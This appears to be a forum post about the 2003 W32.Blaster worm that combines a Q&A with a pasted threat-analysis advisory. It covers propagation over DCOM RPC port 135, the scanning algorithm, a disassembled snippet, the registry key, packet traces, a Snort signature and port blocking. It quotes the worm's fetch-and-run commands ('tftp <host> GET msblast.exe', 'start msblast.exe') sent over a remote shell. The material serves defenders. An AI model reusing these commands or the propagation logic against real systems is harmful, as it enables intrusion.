Now that Variant Blaster.b has been unearthed it is a matter of time before someone makes a Memory Resident version.
Patch Patch and Patch
Blaster.b seems to only be using a different exe. The name is Penis.exe (if that gets deleted that is to say malegenetaliapropername.exe )
Some Symptoms
svchost.exe error message after “spontaneous” reboot
- copy and paste functions don’t work anymore (file contents, or files themselves)
- FIND window doesn’t work
- properties of any event in event viewer
These are the result of failed attempts to exploit the vulnerability. Due to a bug in the worm, this is a side effect of the infection behavior. Once patched, the systems should no longer exhibit these behaviors.
If the Fixtool does not detect W32.Blaster on these systems, AND the OS on these is eiter NT4, or Windows 2003 server, then you have explain to them that that is correct. While W32.Blaster.Worm cannot spread to Windows NT or Windows 2003 Server, unpatched computers running these operating systems may crash as the result of attempts by the worm to exploit them.
Understand ?
NT and 2003 are Vulnerable but may not aid propagation or be infected .
Questions
Q. Can this particular worm be memory resident like slammer?
A. No, not this worm.
Q. How does it get in? Definitely not email?
A. Network based purely at present. In general, the following ports should be filtered at the netowrk perimeter TCP/UDP 135, UDP 137, UDP 138, TCP 139, TCP/UDP 445 and TCP 593. In relation to this particular exploit, block access to TCP port 4444 at the firewall level, and then block the following ports, if they do not use the applications listed: TCP Port 135, “DCOM RPC”, UDP Port 69, “TFTP”.
Q. Does the worm propage using typical uname and pass?
A. An attacker can exploit this vulnerability by crafting a specifically malformed RPC packet and sending it to a vulnerable server. The attacker will need access to the vulnerable server RPC interface that is located at port 135. A malicious attacker may use this vulnerability to execute code of his choice on the victim machine. Since the RPC service executes with SYSTEM privileges an attacker executing code as the result of this attack can fully compromise the vulnerable server
Q. Is a reboot required to activate the virus the machine?
A. A reboot is NOT required for the msblast.exe file to executed. See below:
“The worm will start a tftp server on the attacking host; this will allow the victim host to download a copy
of the worm (msblast.exe) after a successful compromise. The worm will also open a command shell on
TCP port 4444 on the victim host, allowing commands to be sent to the infected system. The worm will
issue the commands “tftp <host> GET msblast.exe” and “start msblast.exe” over the command shell. The
command shell on TCP port 4444 does not remain open after the attacking host disconnects subsequent
to issuing its commands.”
Q. What’s the intensity of the network scans?
A. The attacking host will issue 20 simultaneous connect() calls, each going to a unique IP address. The
host will then use a select() call to determine which host have responded. Upon receiving a response the
worm will attempt to exploit the host. Therefore for each infected host, 20 could be potentially attacked.
Q. If it’s propagating by ‘guessed IP addresses’ then can it potentially cause printers to print garbage like bugbear did?
A. It definitely will potentially hit IP-based network printers but the effects it will have are still unclear. The question is, do network printers listen for RPC on port 135? Will update you on this asap.
The W32.Blaster worm, which propagates via the Microsoft
Windows DCOM RPC Interface Buffer Overrun Vulnerability, has
recently been observed propagating at notable rate in the wild.
The *********** team has obtained a copy of the
worm and has conducted an analysis of the binary.
Action Items
The ********* Team encourages network
administrators to:
•Ensure that all available patches and feasible mitigating
strategies provided in Microsoft Security Bulletin MS03-026
have been applied.
•Ensure that the following ports are filtered at the network
perimeter and between all untrusted network segments:
udp/135, udp/137, udp/138, tcp/135, tcp/445, tcp/593.
•Deploy the provided Snort signature to assist in the
detection of exploitation attempts targeting this issue.
Technical Description
It is known that the W32.Blaster worm attempts to conduct a Denial of Service (DoS) attack against
windowsupdate.com during a specific time period. The worm checks to see if the date is later than
August 15, and prior to December 31. If these conditions are met, the denial of service attack will be
performed.
The DoS attack will also be launched after the 15th of each month that is not in the
aforementioned range.
The worm will start a tftp server on the attacking host; this will allow the victim host to download a copy
of the worm (msblast.exe) after a successful compromise.
The worm will also open a command shell on
TCP port 4444 on the victim host, allowing commands to be sent to the infected system. The worm will
issue the commands “tftp <host> GET msblast.exe” and “start msblast.exe” over the command shell. The
command shell on TCP port 4444 does not remain open after the attacking host disconnects subsequent
to issuing its commands.
The worm can spread via Windows 2000 and XP. It uses two universal offsets, one for each affected
operating system.
The following code segment is used to determine the offset used to compromise a
vulnerable host. There is an 80% chance that the Windows XP offset will be used and a 20% chance that
the Windows 2000 offset will be used for exploitation.
.text:00401496 mov ds:data_whichOffset, 1
.text:004014A0 call rand
.text:004014A5 mov ecx, 10
.text:004014AA cdq
.text:004014AB idiv ecx
.text:004014AD cmp edx, 7
.text:004014B0 jle short loc_4014BC
.text:004014B2 mov ds:data_whichOffset, 2
The worm also carries a payload of encoded shellcode.
The worm adds the following key to the registry upon successful exploitation:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update
This registry key contains the value “msblast.exe”. This is likely to ensure that the worm will run upon
system startup.
In order to prevent the worm from being executed multiple times on a single system, the worm creates a
mutex lock using the name BILLY.
The attacking host will issue 20 simultaneous connect() calls, each going to a unique IP address. The
host will then use a select() call to determine which host have responded. Upon receiving a response the
worm will attempt to exploit the host.
The worm uses an algorithm based off the current local host IP address to find IP address to attack.
Given the local host IP address A.B.C.D, ‘D’ is set to zero. If C is greater than 20, a random number (less
than 20) is subtracted from C. Once this semi random IP address has been calculated, the worm will
continually increment the IP address, attacking in a sequential order. This means the local subnet will
become saturated with port 135 requests prior to exiting the local subnet.
Packet Traces
The following packet traces depicts scanning for vulnerable machines conducted by the worm:
08/11-16:56:52.942469 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1249 -> 62.177.236.1:135 TCP TTL:128 TOS:0x0 ID:23199 IpLen:20 DgmLen:48 DF *****S Seq: 0xD01F7CE9 Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-16:56:52.943438 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1250 -> 62.177.236.2:135 TCP TTL:128 TOS:0x0 ID:23200 IpLen:20 DgmLen:48 DF *****S Seq: 0xD020129A Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-16:56:52.944197 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:1251 -> 62.177.236.3:135 TCP TTL:128 TOS:0x0 ID:23201 IpLen:20 DgmLen:48 DF *****S Seq: 0xD020F1CE Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
The following packet trace illustrates an infection attempt against a potential victim:
08/11-15:26:09.095239 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3E 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13809 IpLen:20 DgmLen:48 DF **S Seq: 0x7B91948D Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:09.095309 0:50:56:C0:0:1 -> 0:C:29:41:1F:13 type:0x800 len:0x3E 172.16.61.2:135 -> 172.16.77.129:4010 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:48 DF AS Seq: 0x378FC8B6 Ack: 0x7B91948E Win: 0x16D0 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:09.095923 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x3C 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13810 IpLen:20 DgmLen:40 DF A Seq: 0x7B91948E Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.131282 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x7E 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13856 IpLen:20 DgmLen:112 DF AP Seq: 0x7B91948E Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20 05 00 0B 03 10 00 00 00 48 00 00 00 7F 00 00 00 …H… D0 16 D0 16 00 00 00 00 01 00 00 00 01 00 01 00 … A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 …F 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 …]… 2B 10 48 60 02 00 00 00 +.H`…
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.131320 0:50:56:C0:0:1 -> 0:C:29:41:1F:13 type:0x800 len:0x36 172.16.61.2:135 -> 172.16.77.129:4010 TCP TTL:64 TOS:0x0 ID:30958 IpLen:20 DgmLen:40 DF A Seq: 0x378FC8B7 Ack: 0x7B9194D6 Win: 0x16D0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/11-15:26:17.132220 0:C:29:41:1F:13 -> 0:50:56:C0:0:1 type:0x800 len:0x5EA 172.16.77.129:4010 -> 172.16.61.2:135 TCP TTL:128 TOS:0x0 ID:13857 IpLen:20 DgmLen:1500 DF A Seq: 0x7B9194D6 Ack: 0x378FC8B7 Win: 0x4470 TcpLen: 20
I have a lot more captures if you need them .
Also if anyone wants teh Snorts then let me know
Description of Vulnerabilities
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability
http://www.securityfocus.com/bid/8205
A buffer overrun vulnerability has been reported in Microsoft Windows that can be exploited remotely via
a DCOM RPC interface that listens on TCP/UDP port 135. The issue is due to insufficient bounds checking
of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious
instructions with Local System privileges on an affected system.
IDS Signatures
Update: There have been reports indicating the included snort signature (see below) fails to properly
detect all worm related traffic. The problem appears to be related to the “flow: established” directive. To
ensure proper detection, organizations may want to remove the “flow: established” directive.
The Threat Analyst Team has created the following Snort signature designed to detect exploitation of the
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability.
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 \ (msg:“DCE RPC Interface Buffer Overflow Exploit”; \ content:"|00 5C 00 5C|"; \ content:!"|5C|"; within:32; \ flow:to_server,established; \ reference:bugtraq,8205; rev: 1; )
Based on the analysis of the code found in rpcss.dll and information available in the advisory released by
the Xfocus researchers, it has been determined that an unchecked copy operation into a 32-byte buffer
occurs in function “GetMachineName”. The signature works by identifying NetBIOS names in packets
destined for the RPC ports that are greater than 32 bytes in length. A NetBIOS machine name is
delimited by UNICODE sequences “\” and “”.
False positives may occur if an innocuous string satisfying the above criteria is found in an RPC packet.
The likelihood of this particular combination of characters occurring outside of the scope of NetBIOS
machine names is quite low, and as such the number of false positives is expected to be minimal. False
negatives are not expected.
The following IDS vendors have released signatures to detect exploitation attempts against the Microsoft
Windows DCOM RPC Interface Buffer Overrun Vulnerability.
Mitigating Strategies
Ensure that the following ports are filtered at the network perimeter: TCP/UDP 135, UDP 137, UDP 138,
TCP 139, TCP/UDP 445 and TCP 593.